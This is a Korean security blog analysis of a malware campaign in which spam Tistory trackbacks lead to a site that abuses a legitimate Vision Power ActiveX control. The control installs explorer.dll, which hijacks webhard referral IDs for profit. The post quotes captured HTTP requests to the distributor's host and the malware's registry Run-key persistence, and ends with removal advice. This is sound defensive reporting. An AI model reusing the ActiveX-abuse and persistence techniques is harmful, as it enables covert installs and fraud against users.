본문 바로가기

벌새::Analysis

블로그 트랙백을 이용한 국내 악성코드 유포와 웹하드 추천인

728x90
반응형
최근 티스토리(Tistory) 블로그를 중심으로 트랙백(Trackback)에 특정 아이피(IP) 사용자의 웹하드 홍보 관련 항목이 주기적으로 등록되는 것을 볼 수 있습니다.


해당 홍보 트랙백은 프로그램을 통한 자동 등록으로 보이며, 만약 스팸 처리가 발생할 경우 블로그 게시글의 제목을 이용하여 스팸 필터링을 우회하는 모습도 확인할 수 있습니다.


처음 해당 트랙백에 블로그에 출현한 것은 12월 13일 경으로 추정되며, 국내 웹하드 업체 다운로드 쿠폰을 미끼로 사이트 가입 및 해당 광고자의 추천인 아이디 자동 등록을 유도하는 것으로 보입니다.


하지만 오늘 확인한 정보에 따르면 해당 트랙백으로 연결된 사이트에서 국내 보안업체 비전파워(Vision Power) ActiveX Control 설치창을 제공하는 악의적인 방법으로 배포가 이루어지고 있는 것을 확인할 수 있었습니다.


해당 ActiveX 설치창은 [PC지기 컨트롤]이라는 이름으로 실제 비전파워 업체에서 제공하는 정보를 이용하여 정상적인 보안 프로그램을 설치하는 것으로 사용자를 속이기 위해 구성되어 있습니다.


실제 해당 디지털 서명을 보시면 유효하다고 표시가 되어 있지만, 인증서 유효기간은 2006년까지로 확인이 되고 있으며, 어떤 경로를 통해 비전파워 ActiveX Control이 악용되는 것으로 추정됩니다.


해당 ActiveX 설치 웹 페이지의 소스를 확인해보면 ActiveX Control Clsid 등록값 [15EDD727-C89B-4639-8157-A731271E2EA6]은 정상적인 비전파워에서 사용하는 값이며, 대신 사용자가 실제 설치를 하는 과정에서 비전파워 서버가 아닌 유포자 서버에서 파일을 다운로드하는 것을 확인할 수 있었습니다.

[ActiveX 설치를 통한 파일 다운로드 경로]

Http: Request, GET /ver/Installer.cab
Command: GET
 + URI: /ver/Installer.cab
ProtocolVersion: HTTP/1.1
Accept:  */*
UserAgent:  PZLaunch
Host:  123.109.93.117:6050
Connection:  Keep-Alive
Cache-Control:  no-cache
HeaderEnd: CRLF


참고로 해당 호스팅 아이피는 블로그 트랙백에 등록되는 아이피 정보와 일치한 것을 확인할 수 있습니다.

생성 폴더, 파일 정보


 이렇게 설치된 파일은 Internet Explorer 프로그램이 사용하는 정상적인 폴더 내부의 Temp 폴더에 파일을 생성하고 있으며, [%systemroot%\Downloaded Program Files] 폴더에는 정상적인 비전파워 ActiveX Control 관련 파일을 생성하고 있습니다.

설치된 프로그램은 explorer.dll 파일을 시작 프로그램으로 등록하여 자동 실행되며, 좌측 그림과 같이 프로세스에 상주하고 있는 것을 확인할 수 있습니다.


해당 생성 파일 폴더의 파일 구성을 보시면 시작 프로그램으로 등록된 explorer.dll 파일 이외에 expIorer.dll 파일을 배치하여 사용자에게 혼동을 주는 것을 확인할 수 있습니다.

explorer.dll


[explorer.dll 파일 네트워크 정보]

Http: Request, GET /bbs/keyword.php
Command: GET
 + URI: /bbs/keyword.php
ProtocolVersion: HTTP/1.1
Accept:  image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
UserAgent:  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Host:  www.beagler.co.kr
Cache-Control:  no-cache
HeaderEnd: CRLF


메모리에 상주하는 explorer.dll 파일의 경우 배포 서버와 연결하고 있으며, 해당 서버에 등록된 국내 웹하드 업체 추천인 아이디 정보와 사용자가 웹하드 업체 가입시 서버에 등록된 자신의 추천인 아이디를 사용자 몰래 입력하여 금전적 이득을 취하는 것으로 추정됩니다.

[생성 레지스트리 등록 정보]

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{15EDD727-C89B-4639-8157-A731271E2EA6}\iexplore\AllowedDomains\yoonlife.info
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 - Internet Explorer = C:\Program Files\Internet Explorer\Temp\explorer.dll


해당 프로그램을 삭제하기 위해서는 현재 알약 제품에서 업데이트가 된 것으로 알려져 있으므로, 보안제품을 통해 시스템 정밀 검사를 해 보시기 바랍니다.(nProtect 진단 추가 예정)

프로그램은 삭제 기능을 제공하지 않으며, 사용자에게는 타 서비스 정보를 제시하고 사용자 몰래 프로그램을 설치하는 전형적인 악성코드입니다.

참고로 생성되는 비전파워 ActiveX 관련 파일 및 레지스트리 정보는 정상적인 값이므로 사용자 판단에 따라 삭제를 하시기 바랍니다.

자신의 블로그에 해당 트랙백이 존재할 경우에는 삭제를 하시기 바라며, 만약 사이트 접근을 하신 경우 ActiveX를 설치하지 마시기 바랍니다. 단지 이미 비전파워 ActiveX가 설치된 컴에서는 이전에 정상적인 비전파워 프로그램 동작을 위한 부분이 이번에는 자동으로 악성코드가 사용자 동의없이 설치될 위험성이 존재해 보입니다.

해당 프로그램을 수동으로 삭제하시기 위해서는 반드시 작업 관리자에서 explorer.dll 프로세스를 수동으로 종료하시고, 생성 파일을 삭제하시기 바랍니다.
728x90
반응형